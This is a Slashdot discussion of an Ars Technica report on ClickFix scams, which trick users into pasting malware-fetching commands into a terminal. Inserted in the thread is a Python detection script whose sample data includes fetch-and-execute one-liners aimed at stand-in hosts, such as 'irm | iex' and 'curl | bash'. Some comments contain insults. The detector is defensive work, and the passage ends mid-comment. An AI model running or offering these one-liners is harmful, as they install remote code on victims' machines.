
ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com)

(Tuesday November 11, 2025 @10:30PM (BeauHD) from the PSA dept.)


An anonymous reader quotes a report from Ars Technica:

> ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text [1]causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.


> The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.

Researchers from CrowdStrike described in [2]a report a campaign designed to infect Macs with a Mach-O executable. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, [3]reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.



[1] https://arstechnica.com/security/2025/11/clickfix-may-be-the-biggest-security-threat-your-family-has-never-heard-of/

[2] https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/

[3] https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/



Are people this ignorant of basic online security? (Score:4, Informative)

by Smonster ( 2884001 )

Clearly.

Fortunately there is an easy fix. Education. Never click on links from any email you receive unless you just initiated the link being sent to you. Go to the business's actual website and log in from there. If it's legit you'll very likely see what it was talking about upon login or after a brief search through the site's menus.

Unfortunately, many people are too lazy or ignorant, and/or refuse to take basic and easy precautions. And yes, some people are just dumb on their best days. That's why things like this work if you send such scams to enough people.

Re: (Score:2)

by bill_mcgonigle ( 4333 ) *

Yes, but half the people have below-average intelligence.

We won't have a stable society if they're constantly scammed.

And I know some High-IQ people with no street smarts who got scammed by "Raj from Microsoft Support".

Really some dude from a trailer park might have a better BS detector, having lived a less coddled existence.

Re: (Score:2)

by fahrbot-bot ( 874524 )

> Never click on links from any email you receive unless you just initiated the link being sent to you.

Certainly don't ever, "copy a string of text, open a terminal window, paste it in, and press Enter".

Seriously, why would any legitimate site ask you to do that? [*smacks forehead*]

WTF? (Score:5, Insightful)

by Randseed ( 132501 )

Why the hell would someone go open a terminal window and paste random shit in from a web page?

Re: (Score:2)

by NoWayNoShapeNoForm ( 7060585 )

Because you can't fix stupid?

Re: (Score:2)

by fahrbot-bot ( 874524 )

> Because you can't fix stupid?

Guessing you really can't ClickFix it. :-)

Re: (Score:3)

by taustin ( 171655 )

"When you're dead, you do not know that you are dead. The pain is felt by others. The same thing happens when you're stupid"

Re: (Score:2)

by ddtmm ( 549094 )

This is comedy gold. Thanks for my laugh of the day.

Re: (Score:2)

by Jjeff1 ( 636051 )

Because they don't know any better. Some official-looking web site says to press some buttons and do something, they do it. No different than Amazon prompting them to type in their credit card number to buy steak knives. Even among knowledgeable people... There is an RMM I use; if you hit F12 in the browser, the hidden browser console has bright red bold font telling you not to paste anything into the console. And it's an RMM tool for IT people.

Re: (Score:2)

by Tailhook ( 98486 )

Credulous boomers that think it's 1950 and the people inside their teeve^H^H^H^H^Hcomputer are benign white folk like them.

Re: (Score:2)

by WankerWeasel ( 875277 )

Average person wouldn't even know what the terminal is, much less how to go about running terminal commands. And anyone that knows what the terminal is, should be smart enough to know not to run terminal commands from any website, even ones you trust.

Re: (Score:2)

by codebase7 ( 9682010 )

Probably because they see idiots typing in [1]"do as I say" [reddit.com] without reading the prompt and then bitch about the broken system after the fact as if it's normal.

Heads up people: If you see a black box with a blinking text cursor and no fancy Word functions, that's an expert-only area and you should leave it the fuck alone!

[1] https://www.reddit.com/r/linux/comments/r8a0y6/my_opinion_on_the_do_as_i_say_problem/

Hey Guys! Click! Fix! Here (Score:2)

by williamyf ( 227051 )

Today, we are gonna learn how to bypass all security safeties with simple hand tools. We will need a breaker bar, a torque wrench and our safety glasses.

PowerShell defaults (Score:5, Informative)

by omnichad ( 1198475 )

PowerShell defaults are partly to blame on the Windows side. You can't double-click a .ps1 file without editing security settings. But you can pipe an irm command into iex and run a random script from the web with no checks at all. Just a one-liner copied and pasted, and you're giving over complete control.

Re: (Score:2)

by codebase7 ( 9682010 )

OK I see the problem. We need to take away the ability to paste from end users. /s
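The Ars summary above notes that the pasted commands are often base64-encoded, and omnichad's comment points at the irm-into-iex one-liner. Neither gives defenders anything to run, so the following is an added example (not code from Ars Technica, CrowdStrike, Push Security, or any commenter) that shows what a detection rule over process command-line telemetry can look like: it decodes PowerShell's -EncodedCommand argument (UTF-16LE wrapped in base64) and flags "fetch from the network and execute in one step" patterns in both the raw and the decoded text. The log lines, the example.invalid hostnames and the macOS curl-piped-to-shell form are all constructed for the demonstration, not taken from the campaigns the article describes.

```python
"""Flag copy-pasted download-and-execute one-liners in process command lines.

Added example for illustration only: the sample command lines below are
constructed, and the patterns cover the forms the discussion names
(irm | iex, base64-encoded PowerShell) plus a generic curl | sh form.
"""
import base64
import re

# Named detection patterns applied to each command line (and, for PowerShell,
# to the decoded -EncodedCommand payload as well).
PATTERNS = [
    # irm/iwr output piped straight into iex / Invoke-Expression
    ("ps-download-exec",
     re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*"
                r"(?:iex|Invoke-Expression)\b", re.I)),
    # iex (irm ...) / Invoke-Expression (Invoke-WebRequest ...) form
    ("ps-download-exec",
     re.compile(r"\b(?:iex|Invoke-Expression)\b\s*\(?\s*"
                r"(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b", re.I)),
    # curl/wget output piped into a shell (assumed macOS/Linux equivalent)
    ("sh-download-exec",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.  The trailing
# whitespace requirement keeps -ExecutionPolicy from matching the short form.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")       # PowerShell encodes as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Return the sorted, de-duplicated list of finding names for one command line."""
    findings = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.add("encoded-powershell")
    for text in (cmdline, decoded or ""):
        for name, pattern in PATTERNS:
            if pattern.search(text):
                findings.add(name)
    return sorted(findings)


def scan(cmdlines):
    """Return [(cmdline, findings)] for every command line that produced a finding."""
    results = []
    for cmdline in cmdlines:
        findings = analyze_command_line(cmdline)
        if findings:
            results.append((cmdline, findings))
    return results


# Constructed sample: the encoded payload is generated here rather than typed in,
# so the blob is guaranteed to be valid UTF-16LE base64.
SAMPLE_ENCODED = base64.b64encode(
    "irm https://example.invalid/a | iex".encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {SAMPLE_ENCODED}",
    'powershell -c "irm https://example.invalid/x | iex"',
    '/bin/bash -c "curl -fsSL https://example.invalid/i.sh | bash"',
    "powershell -NoProfile -Command Get-ChildItem C:\\Users",           # benign
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",  # benign
    "curl https://example.invalid/file.tar.gz -o file.tar.gz",           # download only
]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_COMMAND_LINES):
        print(f"{', '.join(findings):>34}  {cmdline}")
```

The rule is deliberately narrow: a plain download, a script run from a file, or `-ExecutionPolicy Bypass` on its own produces nothing, so the alert fires on the one-step fetch-and-run shape rather than on PowerShell usage in general. In a real deployment the command lines would come from Sysmon event 1, Windows 4688 with command-line auditing, or an EDR's process telemetry rather than the constructed list.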

Ugh (Score:2)

by gurps_npc ( 621217 )

Man, at this point I am thinking I should just disable all links in any email I get.

You can't fix stupid (Score:2)

by OverlordQ ( 264228 )

> The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

I mean . . come on

maybe I'm too dumb, but (Score:1)

by clemare ( 6598318 )

How is it possible that the file downloads itself and executes itself without me interacting with it in macOS? If it's a payload it has to be an .app or .dmg file, because a .sh file needs its permissions changed to executable before it can be run from the GUI; otherwise it is treated like a regular file.

Re: (Score:3)

by apparently ( 756613 )

If my understanding of this part of the summary is correct:

> "The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. "

what happens is, the user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

Re: (Score:2)

by ddtmm ( 549094 )

LOL!

Sorry, you lost me at... (Score:2)

by ddtmm ( 549094 )

"The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter"

Seriously??

The old days... (Score:2)

by dskoll ( 99328 )

Ah yes, reminds me of the bad old days of the first PDP-8 virus:

"Your bank account has been compromised. To restore security, toggle in the following sequence on your PDP-8 front panel: 110101-010010 111110-000000 ..."

Re: (Score:3)

by codebase7 ( 9682010 )

The reason we don't, historically, is because a good number of us have personal experience in dealing with these kinds of "ordinary folks" endlessly.

Initially we were sympathetic, and offered guidance. After a while we all got tired of listening to the excuses and apologies.

Those "ordinary folks" got the idea that as long as they gave a good-sounding excuse or apologized in front of management there would be no consequences. For them. For us, we have to spend time cleaning up their mess, and taking
